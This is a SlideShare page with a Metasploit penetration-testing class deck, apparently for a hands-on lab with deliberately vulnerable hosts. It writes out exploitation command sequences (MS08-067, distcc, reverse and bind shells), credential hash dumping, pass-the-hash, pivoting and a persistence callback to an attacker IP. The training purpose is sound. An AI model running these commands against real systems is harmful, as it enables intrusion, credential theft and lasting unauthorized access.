SlideShare una empresa de Scribd logo
1 de 43
Descargar para leer sin conexión
Penetration Testing with
      Metasploit


        Georgia Weidman
Acknowledgements
•   Metasploit Team
•   Offensive Security/Metasploit Unleashed
•   Hackers for Charity
•   David Kennedy
•   BSides Delaware Crew
•   Darren
Agenda
• Metasploit Basics
  – Some terminology/brief intro to pentesting
  – How Metasploit works
  – Interacting with Metasploit
• Basic Exploitation
  – Exploiting a vulnerability using Metasploit console
• Using Meterpreter
  – Using the Meterpreter shell for post exploitation
Agenda
• Metasploit in a penetration test
  – Information Gathering
  – Vulnerability Scanning
  – Exploitation in depth
  – Post exploitation
  – Reporting
• Hack some stuff
  – Pop my boxes
Connecting
Wireless access point SSID IgnatiusRiley
Password: metasploit
What’s in the lab?
• Windows XP SP2
  – IP address: 192.168.20.22


• Ubuntu Linux 8.04 (Metasploitable)
  – IP address: 192.168.20.23



  Others below .100 (.100 and above are you guys)
What is Penetration Testing?

Simulation of a real attack
Get out of jail free card for exploiting systems
Report to customers with findings and
  recommendations
Find and remediate vulnerabilities before
  attackers exploit them
What is Metasploit?
Exploitation framework
Ruby based
Modular
Exploits, payloads, auxiliaries, and more
Metasploit Terminology
Exploit: vector for penetrating the system
Payload: shellcode, what you want the exploit to
  do
Encoders: encode or mangle payload
Auxiliary: other modules besides exploitation
Session: connection from a successful exploit
Metasploit Interfaces
Msfconsole
Msfcli
Msfweb, Msfgui (discontinued)
Metasploit Pro, Metasploit Express
Armitage
Exploitation Streamlining
• Traditional Pentest:
  – Find public exploit
  – Change offsets and return address for your target
  – Replace shellcode
• Metasploit:
  – Load Metasploit module
  – Select target OS
  – Set IP addresses
  – Select payload
Using Msfconsole: Exploitation

use <module> - sets exploit/auxillary/etc. to use
set <x X> - set a parameter
setg <x X> - set a parameter globally
show <x> - lists all available x
exploit – runs the selected module
Windows Exploitation Example

search windows/smb
info windows/smb/ms08_067_netapi
use windows/smb/ms08_067_netapi
show payloads
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.20.22 (set other options as well)
exploit
MSFcli Exploitation Example
./msfcli <exploit> <option=x> E
Example: msfcli
  windows/smb/ms08_067_netapi
RHOST=192.168.1.2 LHOST=192.168.1.3
PAYLOAD=windows/shell/bind_tcp E
E = exploit
O = show options
P = show payloads
Linux Exploitation Example
search distcc
use unix/misc/distcc_exec
show payloads
set payload cmd/unix/reverse
show options
set rhost 192.168.20.23
set lhost 192.168.20.102 (your ip)
exploit
Sessions
sessions -l lists all active sessions

Sessions –i <id> interact with a given session
Meterpreter
Gain a session using a meterpreter payload

Memory based/never hits the disk

Everything a shell can do plus extra
Meterpreter Commands
help – shows all available commands
background – backgrounds the session
ps – shows all processes
migrate <process id>– moves meterpreter to
another process
getuid – shows the user
Meterpreter Commands
download <file> - pulls a file from the victim
upload <file on attacker> <file on victim> -
  pushes a file to the victim
hashdump – dumps the hashes from the sam
shell – drops you in a shell
Exercise


In Msfconsole use ms08_067_netapi to get a
  reverse meterpreter shell on the Windows XP
  machine.
Experiment with different payloads and
  meterpreter commands.
Information Gathering
Learning as much about a target as possible

Examples: open ports, running services, installed
  software

Identify points for further exploration
Metasploit and Databases
Metasploit supports MySQL and PostgreSQL
/etc/init.d/postgresql-8.4 start (starts
  PostgeSQL)
msf > db_connect
postgres:password@127.0.0.1/metasploit
  (connects to database server and creates
  database metasploit)
Portscanning
Queries a host to see if a program is listening
Ex: Browsing to a website – webserver listens on
   port 80
Listening ports are accessible by an attacker and
   if vulnerable may be used for exploitation
Ex: ms08_067_netapi exploits smb on port 445
Metasploit and nmap
Port scanning and just about everything else
http://nmap.org/ man nmap
Ex: nmap -sV 192.168.20.20-99 -oA subnet1
  (TCP version scan, all hosts 192.168.20.X,
  outputs multiple formats beginning with
  subnet1)
msf > db_import subnet1.xml
MSF Axillary Portscanners
msf > search portscan (shows portscan modules)
scanner/portscan/tcp (runs a TCP syn scan)
Use auxiliary modules like exploits (use, set,
  exploit, etc.)
Some Other MSF Scanners
scanner/smb/smb_version (scans port 445 for
  the smb version, good way to get OS version)
scanner/ssh/ssh_version (queries the ssh
  version)
scanner/ftp/anonymous (anonymous ftp login)
Vulnerability Scanning
Query systems for potential vulnerabilities
Identify potential methods of penetration
Ex: SMB version scan in information gathering
  returned port 445 open and target Windows
  XP SP2, scan for ms08_067_netapi
  vulnerability
Metasploit and Nessus
Tenable's Vulnerability Scanner (http://www.nessus.org)
msf>load nessus
msf > nessus_connect
  student1:password@192.168.20.103 ok (ok says no ssl
  is ok)
msf > nessus_policy_list
msf > nessus_scan_new -4 pwnage <ip range> (scan
  using policy one, name it pwnage)
msf> nessus_report_list
msf> nessus_report_get <report id>
Metasploit Vulnerability Scanners
SMB Login
  Given a set of credentials what systems can they
     access?
     scanner/smb/smb_login
Open VNC and X11
  If misconfigured may be accessible without
     credentials
     scanner/vnc/vnc_none_auth
     scanner/x11/open_x11
Using Msfconsole: Exploitation

use <module> - sets exploit/auxillary/etc. to use
set <x X> - set a parameter
setg <x X> - set a parameter globally
show <x> - lists all available x
exploit – runs the selected module
Our Database
hosts

services

vulns

-c select columns
-s search for specific string
db_autopwn
By default just runs all the exploits that match a
  given open port
Not stealthy
Using vulnerability data can be made smarter,
  matches vulnerabilities instead of ports
db_autopwn -x -e
Attacking MSSQL
MSSQL TCP port can change, UDP port is 1434
msf> search mssql (shows all mssql modules)
msf> use scanner/mssql/mssql_ping (queries
 UDP 1434 for information including TCP port)
msf> use scanner/mssql/mssql_login (tries
 passwords to log into mssql)
msf> use windows/mssql/mssql_payload (logs
 into mssql and gets a shell
We have a shell, now what?
Privilege escalation
Local information gathering
Exploiting additional hosts
Maintaining access
Forensic avoidance
Meterpreter: Privilege Escalation
A session has the privileges of the exploited
  process
getuid (tells you what user your session is
  running as)
getsystem (tries various techniques to escalate
  privileges)
Meterpreter: Enabling Remote
               Desktop
Turn on remote desktop, get it through the
  firewall, put a user in the remote desktop
  users group
run getgui –e
Meterpreter: Migrating
If the process that hosts meterpreter closes
   meterpreter dies too
Example: client side exploit residing in the
   browser
meterpreter> ps (shows all processes)
meterpreter> migrate <process id> (moves to a
   new process)
Meterpreter: Searching for Content
Look for specific interesting files on the
  exploited system
search -h
Example: search -f *.jpg (finds all the porn)
Pivoting
Scenario: Exploit a dual networked host, with a
  routeable interface and non routable one. Can we
  attack other hosts on the non routeable interface
  without SSH tunneling?
Route add 10.0.0.0/24 1 (routes traffic to the
  subnet through session 1)
Now you can portscan, exploit, etc. the non
  routable subnet
PSExec
hashdump (dumps the hashes, not always easy
  to crack)
Why not just pass the hash to other systems?
use windows/smb/psexec
set SMBPass to the hash
Meterpreter: Persistence
Persistence script installs a meterpreter service
Meterpreter comes back when the box restarts
  Ex: run persistence -U -i 5 -p 443 –r
  192.168.20.101 (respawns on login, at a 5
  second interval on port 443 to ip
  192.168.20.101)
Exercises
Perform a penetration test on the Windows and
  Linux systems we used in class

Perform a penetration test on the lab network
Contact
        Georgia Weidman

Website: http://www.grmn00bs.com
 http://www.georgiaweidman.com
  Email: georgia@grmn00bs.com
     Twitter: @vincentkadmon

Más contenido relacionado

La actualidad más candente

Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network SecurityAshok Reddy Medikonda
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploitAashish R
 
Server-side template injection- Slides
Server-side template injection- Slides Server-side template injection- Slides
Server-side template injection- Slides Amit Dubey
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainSuvrat Jain
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introductionMostafa Abdel-sallam
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to MetasploitGTU
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
Siber Güvenlik ve Etik Hacking Sunu - 4
Siber Güvenlik ve Etik Hacking Sunu - 4Siber Güvenlik ve Etik Hacking Sunu - 4
Siber Güvenlik ve Etik Hacking Sunu - 4Murat KARA
 
Siber Güvenlik ve Etik Hacking Sunu - 9
Siber Güvenlik ve Etik Hacking Sunu - 9Siber Güvenlik ve Etik Hacking Sunu - 9
Siber Güvenlik ve Etik Hacking Sunu - 9Murat KARA
 
Siber Güvenlik ve Etik Hacking Sunu - 11
Siber Güvenlik ve Etik Hacking Sunu - 11Siber Güvenlik ve Etik Hacking Sunu - 11
Siber Güvenlik ve Etik Hacking Sunu - 11Murat KARA
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingNezar Alazzabi
 
Siber Güvenlik ve Etik Hacking Sunu - 5
Siber Güvenlik ve Etik Hacking Sunu - 5Siber Güvenlik ve Etik Hacking Sunu - 5
Siber Güvenlik ve Etik Hacking Sunu - 5Murat KARA
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to MetasploitHossein Yavari
 

La actualidad más candente (20)

Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
 
Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network Security
 
Metasploitable
MetasploitableMetasploitable
Metasploitable
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
 
Server-side template injection- Slides
Server-side template injection- Slides Server-side template injection- Slides
Server-side template injection- Slides
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jain
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
 
Port scanning
Port scanningPort scanning
Port scanning
 
Nmap and metasploitable
Nmap and metasploitableNmap and metasploitable
Nmap and metasploitable
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
Siber Güvenlik ve Etik Hacking Sunu - 4
Siber Güvenlik ve Etik Hacking Sunu - 4Siber Güvenlik ve Etik Hacking Sunu - 4
Siber Güvenlik ve Etik Hacking Sunu - 4
 
Siber Güvenlik ve Etik Hacking Sunu - 9
Siber Güvenlik ve Etik Hacking Sunu - 9Siber Güvenlik ve Etik Hacking Sunu - 9
Siber Güvenlik ve Etik Hacking Sunu - 9
 
Siber Güvenlik ve Etik Hacking Sunu - 11
Siber Güvenlik ve Etik Hacking Sunu - 11Siber Güvenlik ve Etik Hacking Sunu - 11
Siber Güvenlik ve Etik Hacking Sunu - 11
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Unsecuring SSH
Unsecuring SSHUnsecuring SSH
Unsecuring SSH
 
Siber Güvenlik ve Etik Hacking Sunu - 5
Siber Güvenlik ve Etik Hacking Sunu - 5Siber Güvenlik ve Etik Hacking Sunu - 5
Siber Güvenlik ve Etik Hacking Sunu - 5
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
 

Destacado

Metasploit
MetasploitMetasploit
Metasploitninguna
 
Bypassing the Android Permission Model
Bypassing the Android Permission ModelBypassing the Android Permission Model
Bypassing the Android Permission ModelGeorgia Weidman
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerShellmates
 
Why Data Virtualization? An Introduction by Denodo
Why Data Virtualization? An Introduction by DenodoWhy Data Virtualization? An Introduction by Denodo
Why Data Virtualization? An Introduction by DenodoJusto Hidalgo
 
Big Data Analytics with Hadoop
Big Data Analytics with HadoopBig Data Analytics with Hadoop
Big Data Analytics with HadoopPhilippe Julio
 
Alphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm.com Support de la formation Hacking et Sécurité MetasploitAlphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm.com Support de la formation Hacking et Sécurité MetasploitAlphorm
 
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2thePlatform
 
Diarrhea:Myths and facts, Precaution
Diarrhea:Myths and facts, Precaution Diarrhea:Myths and facts, Precaution
Diarrhea:Myths and facts, Precaution Wuzna Haroon
 
Alta White Paper D2C eCommerce Case Study 2016
Alta White Paper D2C eCommerce Case Study 2016Alta White Paper D2C eCommerce Case Study 2016
Alta White Paper D2C eCommerce Case Study 2016Patrick Nicholson
 

Destacado (18)

Metasploit
MetasploitMetasploit
Metasploit
 
Metasploit
MetasploitMetasploit
Metasploit
 
Basic Metasploit
Basic MetasploitBasic Metasploit
Basic Metasploit
 
Metasploit Basics
Metasploit BasicsMetasploit Basics
Metasploit Basics
 
Bypassing the Android Permission Model
Bypassing the Android Permission ModelBypassing the Android Permission Model
Bypassing the Android Permission Model
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
 
Ethical Hacking & Penetration Testing
Ethical Hacking & Penetration TestingEthical Hacking & Penetration Testing
Ethical Hacking & Penetration Testing
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
 
Why Data Virtualization? An Introduction by Denodo
Why Data Virtualization? An Introduction by DenodoWhy Data Virtualization? An Introduction by Denodo
Why Data Virtualization? An Introduction by Denodo
 
Big Data Analytics with Hadoop
Big Data Analytics with HadoopBig Data Analytics with Hadoop
Big Data Analytics with Hadoop
 
Big data ppt
Big  data pptBig  data ppt
Big data ppt
 
Alphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm.com Support de la formation Hacking et Sécurité MetasploitAlphorm.com Support de la formation Hacking et Sécurité Metasploit
Alphorm.com Support de la formation Hacking et Sécurité Metasploit
 
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2
mpx Replay, Expedite Your Catch-Up and C3 Workflow 2 of 2
 
"15 Business Story Ideas to Jump on Now"
"15 Business Story Ideas to Jump on Now""15 Business Story Ideas to Jump on Now"
"15 Business Story Ideas to Jump on Now"
 
Diarrhea:Myths and facts, Precaution
Diarrhea:Myths and facts, Precaution Diarrhea:Myths and facts, Precaution
Diarrhea:Myths and facts, Precaution
 
Alta White Paper D2C eCommerce Case Study 2016
Alta White Paper D2C eCommerce Case Study 2016Alta White Paper D2C eCommerce Case Study 2016
Alta White Paper D2C eCommerce Case Study 2016
 
cathy resume
cathy resumecathy resume
cathy resume
 
Basics of Coding in Pediatrics Medical Billing
Basics of Coding in Pediatrics Medical BillingBasics of Coding in Pediatrics Medical Billing
Basics of Coding in Pediatrics Medical Billing
 

Similar a Metasploit for Penetration Testing: Beginner Class

Similar a Metasploit for Penetration Testing: Beginner Class (20)

Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
Cheatsheet: Metasploit
Cheatsheet: MetasploitCheatsheet: Metasploit
Cheatsheet: Metasploit
 
Backtrack Manual Part6
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
 
Hacking 101
Hacking 101Hacking 101
Hacking 101
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
Server hardening
Server hardeningServer hardening
Server hardening
 
Inside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing FirewallInside Out Hacking - Bypassing Firewall
Inside Out Hacking - Bypassing Firewall
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web Workshop
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
Wissbi osdc pdf
Wissbi osdc pdfWissbi osdc pdf
Wissbi osdc pdf
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
 
Backtrack Manual Part7
Backtrack Manual Part7Backtrack Manual Part7
Backtrack Manual Part7
 
SSH for pen-testers
SSH for pen-testersSSH for pen-testers
SSH for pen-testers
 
iCrOSS 2013_Pentest
iCrOSS 2013_PentestiCrOSS 2013_Pentest
iCrOSS 2013_Pentest
 
Metasploit
MetasploitMetasploit
Metasploit
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
 

Último

Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 

Último (20)

Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 

Metasploit for Penetration Testing: Beginner Class

  • 1. Penetration Testing with Metasploit Georgia Weidman
  • 2. Acknowledgements • Metasploit Team • Offensive Security/Metasploit Unleashed • Hackers for Charity • David Kennedy • BSides Delaware Crew • Darren
  • 3. Agenda • Metasploit Basics – Some terminology/brief intro to pentesting – How Metasploit works – Interacting with Metasploit • Basic Exploitation – Exploiting a vulnerability using Metasploit console • Using Meterpreter – Using the Meterpreter shell for post exploitation
  • 4. Agenda • Metasploit in a penetration test – Information Gathering – Vulnerability Scanning – Exploitation in depth – Post exploitation – Reporting • Hack some stuff – Pop my boxes
  • 5. Connecting Wireless access point SSID IgnatiusRiley Password: metasploit
  • 6. What’s in the lab? • Windows XP SP2 – IP address: 192.168.20.22 • Ubuntu Linux 8.04 (Metasploitable) – IP address: 192.168.20.23 Others below .100 (.100 and above are you guys)
  • 7. What is Penetration Testing? Simulation of a real attack Get out of jail free card for exploiting systems Report to customers with findings and recommendations Find and remediate vulnerabilities before attackers exploit them
  • 8. What is Metasploit? Exploitation framework Ruby based Modular Exploits, payloads, auxiliaries, and more
  • 9. Metasploit Terminology Exploit: vector for penetrating the system Payload: shellcode, what you want the exploit to do Encoders: encode or mangle payload Auxiliary: other modules besides exploitation Session: connection from a successful exploit
  • 10. Metasploit Interfaces Msfconsole Msfcli Msfweb, Msfgui (discontinued) Metasploit Pro, Metasploit Express Armitage
  • 11. Exploitation Streamlining • Traditional Pentest: – Find public exploit – Change offsets and return address for your target – Replace shellcode • Metasploit: – Load Metasploit module – Select target OS – Set IP addresses – Select payload
  • 12. Using Msfconsole: Exploitation use <module> - sets exploit/auxillary/etc. to use set <x X> - set a parameter setg <x X> - set a parameter globally show <x> - lists all available x exploit – runs the selected module
  • 13. Windows Exploitation Example search windows/smb info windows/smb/ms08_067_netapi use windows/smb/ms08_067_netapi show payloads set payload windows/meterpreter/reverse_tcp show options set lhost 192.168.20.22 (set other options as well) exploit
  • 14. MSFcli Exploitation Example ./msfcli <exploit> <option=x> E Example: msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.2 LHOST=192.168.1.3 PAYLOAD=windows/shell/bind_tcp E E = exploit O = show options P = show payloads
  • 15. Linux Exploitation Example search distcc use unix/misc/distcc_exec show payloads set payload cmd/unix/reverse show options set rhost 192.168.20.23 set lhost 192.168.20.102 (your ip) exploit
  • 16. Sessions sessions -l lists all active sessions Sessions –i <id> interact with a given session
  • 17. Meterpreter Gain a session using a meterpreter payload Memory based/never hits the disk Everything a shell can do plus extra
  • 18. Meterpreter Commands help – shows all available commands background – backgrounds the session ps – shows all processes migrate <process id>– moves meterpreter to another process getuid – shows the user
  • 19. Meterpreter Commands download <file> - pulls a file from the victim upload <file on attacker> <file on victim> - pushes a file to the victim hashdump – dumps the hashes from the sam shell – drops you in a shell
  • 20. Exercise In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine. Experiment with different payloads and meterpreter commands.
  • 21. Information Gathering Learning as much about a target as possible Examples: open ports, running services, installed software Identify points for further exploration
  • 22. Metasploit and Databases Metasploit supports MySQL and PostgreSQL /etc/init.d/postgresql-8.4 start (starts PostgeSQL) msf > db_connect postgres:password@127.0.0.1/metasploit (connects to database server and creates database metasploit)
  • 23. Portscanning Queries a host to see if a program is listening Ex: Browsing to a website – webserver listens on port 80 Listening ports are accessible by an attacker and if vulnerable may be used for exploitation Ex: ms08_067_netapi exploits smb on port 445
